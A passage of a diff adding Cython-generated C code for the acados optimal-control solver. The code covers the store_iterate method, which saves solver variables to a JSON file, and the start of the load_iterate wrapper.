__Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 318, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_t_1 = __Pyx_PyObject_Str(__pyx_v_i); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 318, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = PyNumber_Add(__pyx_n_u_t_2, __pyx_t_1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 318, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely((PyDict_SetItem(__pyx_v_solution, __pyx_t_5, __pyx_t_7) < 0))) __PYX_ERR(0, 318, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":319 + * solution['lam_'+str(i)] = self.get(i,'lam') + * solution['t_'+str(i)] = self.get(i, 't') + * solution['sl_'+str(i)] = self.get(i, 'sl') # <<<<<<<<<<<<<< + * solution['su_'+str(i)] = self.get(i, 'su') + * for i in range(self.N): + */ + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_get); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 319, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_5))) { + __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_5); + if (likely(__pyx_t_1)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); + __Pyx_INCREF(__pyx_t_1); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_5, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_1, __pyx_v_i, __pyx_n_u_sl}; + __pyx_t_7 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 319, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + __pyx_t_5 = __Pyx_PyObject_Str(__pyx_v_i); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 319, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 = PyNumber_Add(__pyx_n_u_sl_2, __pyx_t_5); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 319, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely((PyDict_SetItem(__pyx_v_solution, __pyx_t_1, __pyx_t_7) < 0))) __PYX_ERR(0, 319, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":320 + * solution['t_'+str(i)] = self.get(i, 't') + * solution['sl_'+str(i)] = self.get(i, 'sl') + * solution['su_'+str(i)] = self.get(i, 'su') # <<<<<<<<<<<<<< + * for i in range(self.N): + * solution['pi_'+str(i)] = self.get(i,'pi') + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_get); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 320, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_5, __pyx_v_i, __pyx_n_u_su}; + __pyx_t_7 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 320, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_t_1 = __Pyx_PyObject_Str(__pyx_v_i); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 320, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = PyNumber_Add(__pyx_n_u_su_2, __pyx_t_1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 320, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely((PyDict_SetItem(__pyx_v_solution, __pyx_t_5, __pyx_t_7) < 0))) __PYX_ERR(0, 320, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":313 + * solution = dict() + * + * for i in range(self.N+1): # <<<<<<<<<<<<<< + * solution['x_'+str(i)] = self.get(i,'x') + * solution['u_'+str(i)] = self.get(i,'u') + */ + } + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":321 + * solution['sl_'+str(i)] = self.get(i, 'sl') + * solution['su_'+str(i)] = self.get(i, 'su') + * for i in range(self.N): # <<<<<<<<<<<<<< + * solution['pi_'+str(i)] = self.get(i,'pi') + * + */ + __pyx_t_3 = __Pyx_PyInt_From_int(__pyx_v_self->N); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 321, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_7 = __Pyx_PyObject_CallOneArg(__pyx_builtin_range, __pyx_t_3); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 321, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + if (likely(PyList_CheckExact(__pyx_t_7)) || PyTuple_CheckExact(__pyx_t_7)) { + __pyx_t_3 = __pyx_t_7; __Pyx_INCREF(__pyx_t_3); __pyx_t_8 = 0; + __pyx_t_9 = NULL; + } else { + __pyx_t_8 = -1; __pyx_t_3 = PyObject_GetIter(__pyx_t_7); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 321, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_9 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 321, __pyx_L1_error) + } + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + for (;;) { + if (likely(!__pyx_t_9)) { + if (likely(PyList_CheckExact(__pyx_t_3))) { + if (__pyx_t_8 >= PyList_GET_SIZE(__pyx_t_3)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_7 = PyList_GET_ITEM(__pyx_t_3, __pyx_t_8); __Pyx_INCREF(__pyx_t_7); __pyx_t_8++; if (unlikely((0 < 0))) __PYX_ERR(0, 321, __pyx_L1_error) + #else + __pyx_t_7 = PySequence_ITEM(__pyx_t_3, __pyx_t_8); __pyx_t_8++; if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 321, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + #endif + } else { + if (__pyx_t_8 >= PyTuple_GET_SIZE(__pyx_t_3)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_7 = PyTuple_GET_ITEM(__pyx_t_3, __pyx_t_8); __Pyx_INCREF(__pyx_t_7); __pyx_t_8++; if (unlikely((0 < 0))) __PYX_ERR(0, 321, __pyx_L1_error) + #else + __pyx_t_7 = PySequence_ITEM(__pyx_t_3, __pyx_t_8); __pyx_t_8++; if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 321, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + #endif + } + } else { + __pyx_t_7 = __pyx_t_9(__pyx_t_3); + if (unlikely(!__pyx_t_7)) { + PyObject* exc_type = PyErr_Occurred(); + if (exc_type) { + if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); + else __PYX_ERR(0, 321, __pyx_L1_error) + } + break; + } + __Pyx_GOTREF(__pyx_t_7); + } + __Pyx_XDECREF_SET(__pyx_v_i, __pyx_t_7); + __pyx_t_7 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":322 + * solution['su_'+str(i)] = self.get(i, 'su') + * for i in range(self.N): + * solution['pi_'+str(i)] = self.get(i,'pi') # <<<<<<<<<<<<<< + * + * # save + */ + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_get); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 322, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_5))) { + __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_5); + if (likely(__pyx_t_1)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); + __Pyx_INCREF(__pyx_t_1); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_5, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_1, __pyx_v_i, __pyx_n_u_pi}; + __pyx_t_7 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 322, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + __pyx_t_5 = __Pyx_PyObject_Str(__pyx_v_i); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 322, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 = PyNumber_Add(__pyx_n_u_pi_2, __pyx_t_5); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 322, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely((PyDict_SetItem(__pyx_v_solution, __pyx_t_1, __pyx_t_7) < 0))) __PYX_ERR(0, 322, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":321 + * solution['sl_'+str(i)] = self.get(i, 'sl') + * solution['su_'+str(i)] = self.get(i, 'su') + * for i in range(self.N): # <<<<<<<<<<<<<< + * solution['pi_'+str(i)] = self.get(i,'pi') + * + */ + } + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":325 + * + * # save + * with open(filename, 'w') as f: # <<<<<<<<<<<<<< + * json.dump(solution, f, default=lambda x: x.tolist(), indent=4, sort_keys=True) + * print("stored current iterate in ", os.path.join(os.getcwd(), filename)) + */ + /*with:*/ { + __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 325, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(__pyx_v_filename); + __Pyx_GIVEREF(__pyx_v_filename); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_filename); + __Pyx_INCREF(__pyx_n_u_w); + __Pyx_GIVEREF(__pyx_n_u_w); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_n_u_w); + __pyx_t_7 = __Pyx_PyObject_Call(__pyx_builtin_open, __pyx_t_3, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 325, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_10 = __Pyx_PyObject_LookupSpecial(__pyx_t_7, __pyx_n_s_exit); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 325, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + __pyx_t_1 = __Pyx_PyObject_LookupSpecial(__pyx_t_7, __pyx_n_s_enter); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 325, __pyx_L12_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[1] = {__pyx_t_5, }; + __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_6, 0+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 325, __pyx_L12_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_t_1 = __pyx_t_3; + __pyx_t_3 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + /*try:*/ { + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_11, &__pyx_t_12, &__pyx_t_13); + __Pyx_XGOTREF(__pyx_t_11); + __Pyx_XGOTREF(__pyx_t_12); + __Pyx_XGOTREF(__pyx_t_13); + /*try:*/ { + __pyx_v_f = __pyx_t_1; + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":326 + * # save + * with open(filename, 'w') as f: + * json.dump(solution, f, default=lambda x: x.tolist(), indent=4, sort_keys=True) # <<<<<<<<<<<<<< + * print("stored current iterate in ", os.path.join(os.getcwd(), filename)) + * + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_json, __pyx_n_s_dump); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 326, __pyx_L16_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_7 = PyTuple_New(2); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 326, __pyx_L16_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_INCREF(__pyx_v_solution); + __Pyx_GIVEREF(__pyx_v_solution); + PyTuple_SET_ITEM(__pyx_t_7, 0, __pyx_v_solution); + __Pyx_INCREF(__pyx_v_f); + __Pyx_GIVEREF(__pyx_v_f); + PyTuple_SET_ITEM(__pyx_t_7, 1, __pyx_v_f); + __pyx_t_3 = __Pyx_PyDict_NewPresized(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 326, __pyx_L16_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_5 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_13store_iterate_lambda, 0, __pyx_n_s_store_iterate_locals_lambda, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 326, __pyx_L16_error) + __Pyx_GOTREF(__pyx_t_5); + if (PyDict_SetItem(__pyx_t_3, __pyx_n_s_default, __pyx_t_5) < 0) __PYX_ERR(0, 326, __pyx_L16_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (PyDict_SetItem(__pyx_t_3, __pyx_n_s_indent, __pyx_int_4) < 0) __PYX_ERR(0, 326, __pyx_L16_error) + if (PyDict_SetItem(__pyx_t_3, __pyx_n_s_sort_keys, Py_True) < 0) __PYX_ERR(0, 326, __pyx_L16_error) + __pyx_t_5 = __Pyx_PyObject_Call(__pyx_t_1, __pyx_t_7, __pyx_t_3); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 326, __pyx_L16_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":325 + * + * # save + * with open(filename, 'w') as f: # <<<<<<<<<<<<<< + * json.dump(solution, f, default=lambda x: x.tolist(), indent=4, sort_keys=True) + * print("stored current iterate in ", os.path.join(os.getcwd(), filename)) + */ + } + __Pyx_XDECREF(__pyx_t_11); __pyx_t_11 = 0; + __Pyx_XDECREF(__pyx_t_12); __pyx_t_12 = 0; + __Pyx_XDECREF(__pyx_t_13); __pyx_t_13 = 0; + goto __pyx_L21_try_end; + __pyx_L16_error:; + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + /*except:*/ { + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.store_iterate", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_5, &__pyx_t_3, &__pyx_t_7) < 0) __PYX_ERR(0, 325, __pyx_L18_except_error) + __Pyx_XGOTREF(__pyx_t_5); + __Pyx_XGOTREF(__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_7); + __pyx_t_1 = PyTuple_Pack(3, __pyx_t_5, __pyx_t_3, __pyx_t_7); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 325, __pyx_L18_except_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_14 = __Pyx_PyObject_Call(__pyx_t_10, __pyx_t_1, NULL); + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_14)) __PYX_ERR(0, 325, __pyx_L18_except_error) + __Pyx_GOTREF(__pyx_t_14); + __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_t_14); + __Pyx_DECREF(__pyx_t_14); __pyx_t_14 = 0; + if (__pyx_t_4 < 0) __PYX_ERR(0, 325, __pyx_L18_except_error) + __pyx_t_2 = (!__pyx_t_4); + if (unlikely(__pyx_t_2)) { + __Pyx_GIVEREF(__pyx_t_5); + __Pyx_GIVEREF(__pyx_t_3); + __Pyx_XGIVEREF(__pyx_t_7); + __Pyx_ErrRestoreWithState(__pyx_t_5, __pyx_t_3, __pyx_t_7); + __pyx_t_5 = 0; __pyx_t_3 = 0; __pyx_t_7 = 0; + __PYX_ERR(0, 325, __pyx_L18_except_error) + } + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + goto __pyx_L17_exception_handled; + } + __pyx_L18_except_error:; + __Pyx_XGIVEREF(__pyx_t_11); + __Pyx_XGIVEREF(__pyx_t_12); + __Pyx_XGIVEREF(__pyx_t_13); + __Pyx_ExceptionReset(__pyx_t_11, __pyx_t_12, __pyx_t_13); + goto __pyx_L1_error; + __pyx_L17_exception_handled:; + __Pyx_XGIVEREF(__pyx_t_11); + __Pyx_XGIVEREF(__pyx_t_12); + __Pyx_XGIVEREF(__pyx_t_13); + __Pyx_ExceptionReset(__pyx_t_11, __pyx_t_12, __pyx_t_13); + __pyx_L21_try_end:; + } + } + /*finally:*/ { + /*normal exit:*/{ + if (__pyx_t_10) { + __pyx_t_13 = __Pyx_PyObject_Call(__pyx_t_10, __pyx_tuple__17, NULL); + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + if (unlikely(!__pyx_t_13)) __PYX_ERR(0, 325, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_13); + __Pyx_DECREF(__pyx_t_13); __pyx_t_13 = 0; + } + goto __pyx_L15; + } + __pyx_L15:; + } + goto __pyx_L25; + __pyx_L12_error:; + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + goto __pyx_L1_error; + __pyx_L25:; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":327 + * with open(filename, 'w') as f: + * json.dump(solution, f, default=lambda x: x.tolist(), indent=4, sort_keys=True) + * print("stored current iterate in ", os.path.join(os.getcwd(), filename)) # <<<<<<<<<<<<<< + * + * + */ + __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_os); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 327, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_path); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 327, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_5, __pyx_n_s_join); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 327, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_os); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 327, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_15 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_getcwd); if (unlikely(!__pyx_t_15)) __PYX_ERR(0, 327, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_15); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_15))) { + __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_15); + if (likely(__pyx_t_1)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_15); + __Pyx_INCREF(__pyx_t_1); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_15, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[1] = {__pyx_t_1, }; + __pyx_t_5 = __Pyx_PyObject_FastCall(__pyx_t_15, __pyx_callargs+1-__pyx_t_6, 0+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 327, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_15); __pyx_t_15 = 0; + } + __pyx_t_15 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_15 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_15)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_15); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_15, __pyx_t_5, __pyx_v_filename}; + __pyx_t_7 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_15); __pyx_t_15 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 327, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 327, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(__pyx_kp_u_stored_current_iterate_in); + __Pyx_GIVEREF(__pyx_kp_u_stored_current_iterate_in); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_kp_u_stored_current_iterate_in); + __Pyx_GIVEREF(__pyx_t_7); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_7); + __pyx_t_7 = 0; + __pyx_t_7 = __Pyx_PyObject_Call(__pyx_builtin_print, __pyx_t_3, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 327, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":293 + * + * + * def store_iterate(self, filename='', overwrite=False): # <<<<<<<<<<<<<< + * """ + * Stores the current iterate of the ocp solver in a json file. + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_15); + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.store_iterate", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_json); + __Pyx_XDECREF(__pyx_v_solution); + __Pyx_XDECREF(__pyx_v_i); + __Pyx_XDECREF(__pyx_v_f); + __Pyx_XDECREF(__pyx_v_filename); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":330 + * + * + * def load_iterate(self, filename): # <<<<<<<<<<<<<< + * """ + * Loads the iterate stored in json file with filename into the ocp solver. + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_21load_iterate(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_20load_iterate, "\n Loads the iterate stored in json file with filename into the ocp solver.\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_21load_iterate = {"load_iterate", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_21load_iterate, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_20load_iterate}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_21load_iterate(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_filename = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("load_iterate (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_filename,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_filename)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 330, __pyx_L3_error) + else goto 